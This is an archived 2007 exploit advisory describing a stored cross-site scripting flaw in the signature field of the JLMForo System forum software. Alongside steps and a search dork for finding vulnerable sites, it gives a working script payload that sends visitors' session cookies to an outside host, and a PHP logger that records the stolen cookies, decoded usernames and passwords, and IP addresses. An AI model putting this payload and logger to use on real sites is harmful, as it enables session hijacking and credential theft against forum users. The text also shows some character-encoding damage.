Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

FIGIS (FILogin.do) Bypass SQL Injection Vulnerability

Re: PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure

PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure

Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

From:	Jose Luis Góngora Fernández <sys-project_(at)_hotmail.com>
Date:	27.11.2007
Subject:	JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability

# JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability
# Download:
# http://www.miscodigos.com/aplicaciones/JLMForo%20System/
# Bug found by Jose Luis Gуngora Fernбndez / JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Powered By JLMForo System"
# Stop lammer

# Explanation Basic :

1.- Register in the forum (registro.php)
2.- Put in your signature the XSS (modificarPerfil.php)
3.- Create a subject
4.- Wait to an answer to visualize the XSS

# To Rob Cookies:

1є- Register in the forum (registro.php)

2є- Put in your signature the XSS (modificarPerfil.php):

<script>window.location=’http://yousite.com/xss.php?cookie=’+document.
cookie</script>

3є- Upload in your Site:

<?php
$archivo = fopen('log2.htm','a');//Aquн podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>

IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>

4є- Chmod 777 archive

5є- Create a subject

6є- Wait to an answer to run the XSS

//---------------------------------------\\

Greetz To: All Hackers
Jose Luis Gуngora Fernбndez / JosS!